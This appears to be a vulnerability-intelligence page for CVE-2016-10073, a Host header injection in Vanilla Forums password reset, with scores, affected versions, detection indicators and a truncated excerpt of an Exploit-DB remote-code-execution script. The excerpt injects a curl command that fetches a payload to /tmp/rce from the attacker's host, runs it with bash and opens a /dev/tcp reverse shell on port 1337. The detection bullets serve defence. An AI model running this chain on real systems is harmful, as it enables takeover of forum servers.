CVE-2016-10073
published 2017-05-23CVE-2016-10073: The from method in library/core/class.email.php in Vanilla Forums before 2.3.1 allows remote attackers to spoof the email domain in sent messages and…
PriorityP269high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
83.61%
99.7th percentile
The from method in library/core/class.email.php in Vanilla Forums before 2.3.1 allows remote attackers to spoof the email domain in sent messages and potentially obtain sensitive information via a crafted HTTP Host header, as demonstrated by a password reset request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vanillaforums | vanilla | <= 2.3.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to /entry/passwordrequest where the Host header contains shell commands, IP addresses, or non-domain values — a crafted Host header is the attack vector for CVE-2016-10073. ↗
- →Alert on POST requests to /entry/passwordrequest containing the parameter pattern 'hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password' — this is the exact POST body used in the exploit. ↗
- →Detect outbound connections from the web server to attacker-controlled hosts on port 1337, indicative of the reverse shell callback stage of this exploit chain. ↗
- →Alert on creation or execution of /tmp/rce on the web server host — the exploit drops and executes a shell payload at this path. ↗
- →Inspect the Host header in password-reset requests for embedded bash TCP redirection syntax (e.g. /dev/tcp/), which is used to establish the reverse shell in this exploit. ↗
- ·The vulnerability exists only in Vanilla Forums versions before 2.3.1; patched installations are not affected. Verify the deployed version before triaging alerts. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vanilla Forums < 2.3 - Remote Code Execution
exploitdb·2017-05-11·CVSS 9.8
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Metasploit
HTTP Host Header Injection Detection
metasploit
HTTP Host Header Injection Detection
HTTP Host Header Injection Detection
Checks if the host is vulnerable to Host header injection
No writeups or analysis indexed.
http://packetstormsecurity.com/files/142486/Vanilla-Forums-2.3-Remote-Code-Execution.htmlhttps://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.htmlhttps://open.vanillaforums.com/discussion/33498/critical-security-release-vanilla-2-3-1https://www.exploit-db.com/exploits/41996/http://packetstormsecurity.com/files/142486/Vanilla-Forums-2.3-Remote-Code-Execution.htmlhttps://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.htmlhttps://open.vanillaforums.com/discussion/33498/critical-security-release-vanilla-2-3-1https://www.exploit-db.com/exploits/41996/
2017-05-23
Published